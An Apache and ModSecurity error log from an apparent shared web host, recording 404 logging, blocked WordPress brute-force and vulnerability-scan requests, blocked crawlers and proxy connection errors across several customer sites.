[Tue May 26 14:06:44.797903 2026] [security2:error] [pid 585807:tid 585970] [client 122.114.252.76:49574] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnOHp6I37JgAKrHX-0gAAAKU"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:44.931965 2026] [security2:error] [pid 585807:tid 586031] [client 122.114.252.76:49575] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnOHp6I37JgAKrHX-1wAAAOI"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:45.260216 2026] [security2:error] [pid 585807:tid 585996] [client 122.114.252.76:49577] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbneHp6I37JgAKrHX-5AAAAL8"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:45.402855 2026] [security2:error] [pid 585807:tid 585992] [client 122.114.252.76:49576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbneHp6I37JgAKrHX-5QAAALs"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:45.688929 2026] [security2:error] [pid 585807:tid 585997] [client 122.114.252.76:49579] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbneHp6I37JgAKrHX-8wAAAMA"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:45.789442 2026] [security2:error] [pid 585807:tid 586024] [client 122.114.252.76:49578] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbneHp6I37JgAKrHX-9AAAANs"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:45.817781 2026] [security2:error] [pid 585807:tid 585978] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbneHp6I37JgAKrHX-7AAAAK0"]
[Tue May 26 14:06:45.961607 2026] [security2:error] [pid 585807:tid 585944] [client 122.114.252.76:49585] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbneHp6I37JgAKrHX-_gAAAIw"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:46.231908 2026] [security2:error] [pid 585807:tid 585941] [client 122.114.252.76:49588] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnuHp6I37JgAKrHX_CAAAAIk"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:46.277879 2026] [security2:error] [pid 585807:tid 586019] [client 122.114.252.76:49586] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnuHp6I37JgAKrHX_BwAAANY"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:46.474122 2026] [security2:error] [pid 585807:tid 585947] [client 122.114.252.76:49589] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnuHp6I37JgAKrHX_DwAAAI8"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:46.794131 2026] [security2:error] [pid 585807:tid 585984] [client 122.114.252.76:49590] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnuHp6I37JgAKrHX_GwAAALM"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:46.857376 2026] [security2:error] [pid 585807:tid 585937] [client 122.114.252.76:49591] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnuHp6I37JgAKrHX_HAAAAIU"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:46.915368 2026] [security2:error] [pid 585807:tid 585976] [client 122.114.252.76:49593] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbnuHp6I37JgAKrHX_JAAAAKs"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:47.301824 2026] [security2:error] [pid 585807:tid 586030] [client 122.114.252.76:49594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbn-Hp6I37JgAKrHX_MQAAAOE"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:47.927349 2026] [security2:error] [pid 585807:tid 586037] [client 122.114.252.76:49595] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbn-Hp6I37JgAKrHX_OwAAAOg"], referer: https://panda-eco.com/governance-meetings/
[Tue May 26 14:06:48.228383 2026] [security2:error] [pid 585807:tid 586005] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbn-Hp6I37JgAKrHX_QQAAAMg"]
[Tue May 26 14:06:50.021199 2026] [security2:error] [pid 585807:tid 586049] [client 95.70.131.179:63140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVboeHp6I37JgAKrHX_cQAAAPM"]
[Tue May 26 14:06:50.021441 2026] [security2:error] [pid 585807:tid 586049] [client 95.70.131.179:63140] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVboeHp6I37JgAKrHX_cQAAAPM"]
[Tue May 26 14:06:50.192307 2026] [security2:error] [pid 585807:tid 585841] [remote 91.134.89.60:54528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVbouHp6I37JgAKrHX_fAAAziE"]
[Tue May 26 14:06:50.493360 2026] [security2:error] [pid 585807:tid 586020] [client 185.191.171.18:22890] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVbouHp6I37JgAKrHX_igAAANc"]
[Tue May 26 14:06:50.493492 2026] [security2:error] [pid 585807:tid 586020] [client 185.191.171.18:22890] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVbouHp6I37JgAKrHX_igAAANc"]
[Tue May 26 14:06:50.850765 2026] [security2:error] [pid 585807:tid 585966] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbouHp6I37JgAKrHX_iQAAAKE"]
[Tue May 26 14:06:51.276287 2026] [security2:error] [pid 585807:tid 586026] [client 202.141.30.10:65431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbo-Hp6I37JgAKrHX_pAAAAN0"]
[Tue May 26 14:06:51.276428 2026] [security2:error] [pid 585807:tid 586026] [client 202.141.30.10:65431] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbo-Hp6I37JgAKrHX_pAAAAN0"]
[Tue May 26 14:06:51.640386 2026] [security2:error] [pid 585807:tid 585856] [remote 95.70.131.179:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVbo-Hp6I37JgAKrHX_twAAyjA"]
[Tue May 26 14:06:51.640530 2026] [security2:error] [pid 585807:tid 586007] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVbo-Hp6I37JgAKrHX_twAAyjA"]
[Tue May 26 14:06:52.323374 2026] [security2:error] [pid 585807:tid 586004] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbo-Hp6I37JgAKrHX_vwAAAMc"]
[Tue May 26 14:06:54.590205 2026] [security2:error] [pid 585807:tid 585972] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbpuHp6I37JgAKrHX_-QAAAKc"]
[Tue May 26 14:06:56.393067 2026] [security2:error] [pid 585807:tid 586014] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbp-Hp6I37JgAKrHUAMQAAANE"]
[Tue May 26 14:06:56.694231 2026] [security2:error] [pid 585807:tid 585862] [remote 14.161.17.36:46452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVbqOHp6I37JgAKrHUAPAAAsTY"]
[Tue May 26 14:06:57.909226 2026] [security2:error] [pid 585807:tid 585967] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbqeHp6I37JgAKrHUAXQAAAKI"]
[Tue May 26 14:06:58.337555 2026] [autoindex:error] [pid 585807:tid 586003] [client 103.108.58.177:44229] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:06:59.927943 2026] [security2:error] [pid 585807:tid 586030] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbq-Hp6I37JgAKrHUAmwAAAOE"]
[Tue May 26 14:07:02.028357 2026] [security2:error] [pid 585807:tid 585996] [client 202.141.30.10:65401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbruHp6I37JgAKrHUA5wAAAL8"]
[Tue May 26 14:07:02.029040 2026] [security2:error] [pid 585807:tid 585996] [client 202.141.30.10:65401] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbruHp6I37JgAKrHUA5wAAAL8"]
[Tue May 26 14:07:02.517968 2026] [security2:error] [pid 585807:tid 586034] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbruHp6I37JgAKrHUA6wAAAOU"]
[Tue May 26 14:07:04.248283 2026] [security2:error] [pid 585807:tid 585913] [remote 111.229.141.137:44760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVbsOHp6I37JgAKrHUBPAAA7mk"]
[Tue May 26 14:07:04.527933 2026] [security2:error] [pid 585807:tid 586003] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbsOHp6I37JgAKrHUBOwAAAMY"]
[Tue May 26 14:07:04.956791 2026] [security2:error] [pid 585807:tid 585978] [client 185.242.3.205:55144] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.digitalgerminate.com"] [uri "/"] [unique_id "ahVbsOHp6I37JgAKrHUBUwAAAK0"]
[Tue May 26 14:07:05.007449 2026] [security2:error] [pid 585807:tid 586016] [client 185.242.3.205:0] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1574"] [id "900936"] [msg "Empty UA autodiscover"] [hostname "autodiscover.digitalgerminate.com"] [uri "/"] [unique_id "ahVbseHp6I37JgAKrHUBVwAAANM"]
[Tue May 26 14:07:05.007540 2026] [security2:error] [pid 585807:tid 586016] [client 185.242.3.205:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "autodiscover.digitalgerminate.com"] [uri "/"] [unique_id "ahVbseHp6I37JgAKrHUBVwAAANM"]
[Tue May 26 14:07:05.013436 2026] [proxy:error] [pid 585807:tid 586040] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:07:05.013481 2026] [proxy_http:error] [pid 585807:tid 586040] [client 185.242.3.205:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:07:05.014146 2026] [proxy:error] [pid 585807:tid 586040] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:07:05.014183 2026] [proxy_http:error] [pid 585807:tid 586040] [client 185.242.3.205:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:07:05.014271 2026] [security2:error] [pid 585807:tid 586040] [client 185.242.3.205:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.digitalgerminate.com"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVbseHp6I37JgAKrHUBWQAAAOo"]
[Tue May 26 14:07:05.025738 2026] [security2:error] [pid 585807:tid 585951] [client 185.242.3.205:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "401"] [hostname "webdisk.digitalgerminate.com"] [uri "/___proxy_subdomain_webdisk/"] [unique_id "ahVbseHp6I37JgAKrHUBWAAAAJM"]
[Tue May 26 14:07:05.051724 2026] [security2:error] [pid 585807:tid 586047] [client 185.242.3.205:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/"] [unique_id "ahVbseHp6I37JgAKrHUBWgAAAPE"]
[Tue May 26 14:07:06.458458 2026] [security2:error] [pid 585807:tid 585975] [client 95.70.131.179:63684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVbsuHp6I37JgAKrHUBkwAAAKo"]
[Tue May 26 14:07:06.458622 2026] [security2:error] [pid 585807:tid 585975] [client 95.70.131.179:63684] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVbsuHp6I37JgAKrHUBkwAAAKo"]
[Tue May 26 14:07:06.731863 2026] [security2:error] [pid 585807:tid 586062] [client 89.249.239.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbsuHp6I37JgAKrHUBhQAAAQA"]
[Tue May 26 14:07:06.757515 2026] [security2:error] [pid 585807:tid 586051] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbsuHp6I37JgAKrHUBiAAAAPU"]
[Tue May 26 14:07:06.949900 2026] [security2:error] [pid 585807:tid 585810] [remote 178.104.90.233:41426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVbsuHp6I37JgAKrHUBowAAvwI"]
[Tue May 26 14:07:07.683340 2026] [security2:error] [pid 585807:tid 586026] [client 185.242.3.205:53391] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVbseHp6I37JgAKrHUBZgAAAN0"]
[Tue May 26 14:07:08.238044 2026] [security2:error] [pid 585807:tid 585973] [client 185.242.3.205:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVbtOHp6I37JgAKrHUBywAAqGI"]
[Tue May 26 14:07:08.610015 2026] [security2:error] [pid 585807:tid 586020] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbtOHp6I37JgAKrHUBygAAANc"]
[Tue May 26 14:07:08.785503 2026] [security2:error] [pid 585807:tid 585911] [remote 185.242.3.205:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 205.3.242.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-admin/install.php"] [unique_id "ahVbtOHp6I37JgAKrHUB2AAA2mc"]
[Tue May 26 14:07:08.785848 2026] [security2:error] [pid 585807:tid 586023] [client 185.242.3.205:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "digitalgerminate.com"] [uri "/wp-admin/install.php"] [unique_id "ahVbtOHp6I37JgAKrHUB2AAA2mc"]
[Tue May 26 14:07:09.274420 2026] [security2:error] [pid 585807:tid 585813] [remote 185.242.3.205:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 205.3.242.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVbteHp6I37JgAKrHUB6QAAkQU"]
[Tue May 26 14:07:09.274657 2026] [security2:error] [pid 585807:tid 585949] [client 185.242.3.205:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "digitalgerminate.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVbteHp6I37JgAKrHUB6QAAkQU"]
[Tue May 26 14:07:10.491522 2026] [security2:error] [pid 585807:tid 586052] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbtuHp6I37JgAKrHUB_wAAAPY"]
[Tue May 26 14:07:12.732120 2026] [security2:error] [pid 585807:tid 585995] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbuOHp6I37JgAKrHUCPwAAAL4"]
[Tue May 26 14:07:12.906079 2026] [security2:error] [pid 585807:tid 585939] [client 202.141.30.10:35536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbuOHp6I37JgAKrHUCVgAAAIc"]
[Tue May 26 14:07:12.906198 2026] [security2:error] [pid 585807:tid 585939] [client 202.141.30.10:35536] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbuOHp6I37JgAKrHUCVgAAAIc"]
[Tue May 26 14:07:14.179554 2026] [security2:error] [pid 585807:tid 585965] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbueHp6I37JgAKrHUCbQAAAKA"]
[Tue May 26 14:07:16.286643 2026] [security2:error] [pid 585807:tid 585949] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbu-Hp6I37JgAKrHUCogAAAJE"]
[Tue May 26 14:07:18.730934 2026] [security2:error] [pid 585807:tid 586042] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbvuHp6I37JgAKrHUC9QAAAOw"]
[Tue May 26 14:07:19.795378 2026] [security2:error] [pid 585807:tid 585882] [remote 193.42.61.12:60442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVbv-Hp6I37JgAKrHUDLQAAk0o"]
